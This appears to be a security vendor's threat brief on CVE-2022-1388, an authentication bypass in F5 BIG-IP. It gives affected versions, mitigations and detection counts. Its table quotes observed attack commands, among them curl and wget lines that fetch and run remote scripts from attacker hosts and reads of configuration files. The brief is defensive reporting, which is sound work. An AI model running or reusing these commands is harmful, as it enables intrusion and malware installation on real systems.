Threat Brief: CVE-2022-1388


Category: Threat Brief, Vulnerability

Tags: ,

A conceptual image representing a vulnerability, such as CVE-2022-1388, discussed in this threat brief

This post is also available in: 日本語 (Japanese)

Executive Summary

On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388. Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. This is a critical vulnerability that needs immediate attention, as it was given a 9.8 CVSS score. Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun.

Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (92570) and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts. 

Unit 42 recommends customers upgrade to the latest release of F5 BIG-IP products. Palo Alto Networks Next Generation Firewall Threat Prevention customers are protected with Signature 92570.

CVEs discussed CVE-2022-1388

Table of Contents

Vulnerable Systems
Mitigation Actions
Observed in the Wild
Additional Resources
Indicators of Compromise

Vulnerable Systems

The F5 product vulnerable to CVE-2022-1388 is BIG-IP with the following versions:

  • 16.1.0 - 16.1.2
  • 15.1.0 - 15.1.5
  • 14.1.0 - 14.1.4
  • 13.1.0 - 13.1.4
  • 12.1.0 - 12.1.6
  • 11.6.1 - 11.6.5

The vulnerability exists within the iControl REST framework used by BIG-IP.

Mitigation Actions

We recommend that customers update their F5 BIG-IP deployments to one of the following versions that have patches to mitigate CVE-2022-1388:

  • 17.0.0
  • 13.1.5

Until you can install the patched versions of BIG-IP, see the Mitigation section on the F5 security advisory for information on how to mitigate this vulnerability via a workaround to limit the vulnerable component to trusted networks.

Observed in the Wild

In response to the F5 security advisory, Palo Alto Networks released the Threat Prevention signature F5 BIG-IP Authentication Bypass Vulnerability (92570) on May 9.

We observed this signature triggered 2,552 times between 4:47 and 14:00 UTC on May 10. We were able to analyze 2,151 packets that triggered the signature and observed both vulnerability scanning activity and active exploitation attempts.

Table 1 shows the commands that would be executed in the event of successful exploitation. These were found by analysis of the packet captures that triggered the F5 BIG-IP Authentication Bypass Vulnerability signature.

Count Command
1954 id
125 cat /config/bigip.conf
24 cat /etc/profile
19 curl -o- -L hxxp://20.239.193[.]47/| sh > /dev/null 2>&1  &
13 whoami
11 find /usr/local/www -name *.php | xargs grep eval
3 curl -fsLk hxxps://transfer[.]sh/dlxo3I/ | sh
1 wget hxxp://20.187.86[.]47/dadda;chmod 777 *;./dadda
1 curl -o- -L hxxp://20.239.193[.]47/kele1|sh

Table 1. Commands observed in CVE-2022-1388 exploitation attempts.


Palo Alto Networks customers receive protections against the exploitation of this vulnerability in the following ways:

  • Next-Generation Firewalls with a Threat Prevention security subscription (running Applications and Threat content update version 8567) can automatically block sessions related to this vulnerability using the F5 BIG-IP Authentication Bypass Vulnerability signature (Threat ID 92570).

Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.

Additional Resources

K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388
EnemyBot Attempts to Exploit CVE-2022-1388

Indicators of Compromise

Payload SHA256


Source IPv4


Hosting URLs


Updated May 16, 2022